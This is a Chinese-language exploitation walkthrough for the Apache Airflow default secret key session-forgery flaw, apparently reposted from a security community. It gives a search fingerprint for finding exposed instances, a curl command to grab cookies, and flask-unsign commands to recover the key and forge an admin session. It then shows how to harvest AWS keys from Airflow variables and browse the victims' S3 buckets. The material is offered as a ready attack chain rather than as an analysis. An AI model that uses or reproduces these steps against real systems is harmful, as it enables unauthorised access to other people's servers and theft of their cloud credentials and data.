0x01 漏洞描述
Apache 官方在2020年12月21日发布的邮件中披露Apache Airflow 存在一个由于错误处理会话验证导致的未授权访问漏洞。如果用户使用了默认的秘钥配置,攻击者就可以在其他的一个配置了默认秘钥的站点进行登录,接着以登录后的session信息直接未授权访问受害者站点。
引用:https://mp.weixin.qq.com/s/EN4bsZl1ylpAtpIlISK3nQ
0x02 漏洞利用
1. FOFA指纹:
title=="Airflow - Login"
2. 获取session
curl -i -s -k -X $'GET' $'http://xxxxxx/admin/airflow/login' | grep Set-Cookie
data:image/s3,"s3://crabby-images/991e0/991e0f1c2b140663d686e7d137817e98298eb7d7" alt=""
3.安装flask-unsign
pip3 install flask-unsign[wordlist]
pip3 install flask-unsign
4. 寻找secret_key
flask-unsign -u -c "cookie"
data:image/s3,"s3://crabby-images/566a3/566a3feabcfb53c6bb751538c4a00e6fb1790d60" alt=""
5. 伪造管理员session
flask-unsign -s --secret "temporary_key" -c "{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"
data:image/s3,"s3://crabby-images/43cb4/43cb44f4fa03749dfe35f093f030f68f98258589" alt=""
6. 后台登陆
设置session
data:image/s3,"s3://crabby-images/aa112/aa11287f88f104d9acdba0a040c732f4042ef948" alt=""
翻看变量,可以拿到AWS__KEY和AWS__SECRET
data:image/s3,"s3://crabby-images/a006e/a006ed98b3723eaa70b7b3f8b402fd0fd865c7a1" alt=""
aws key利用可以参考:https://articles.zsxq.com/id_e1ojtvdxk1tv.html
7. aws s3 bucket利用
下载s3浏览器
https://s3browser.com/download/s3browser-9-5-5.exe
添加KeyID和Secret
data:image/s3,"s3://crabby-images/01de4/01de4af98fb3093335cbaca063883282b3dc9986" alt=""
data:image/s3,"s3://crabby-images/b0802/b0802779fa2c0f7d4513e31d1ab1f4d23d72a556" alt=""
0x03 参考
1. https://ian.sh/airflow
2. https://pypi.org/project/flask-unsign/
3. https://www.openwall.com/lists/oss-security/2020/12/21/1
本文迁移自知识星球“火线Zone”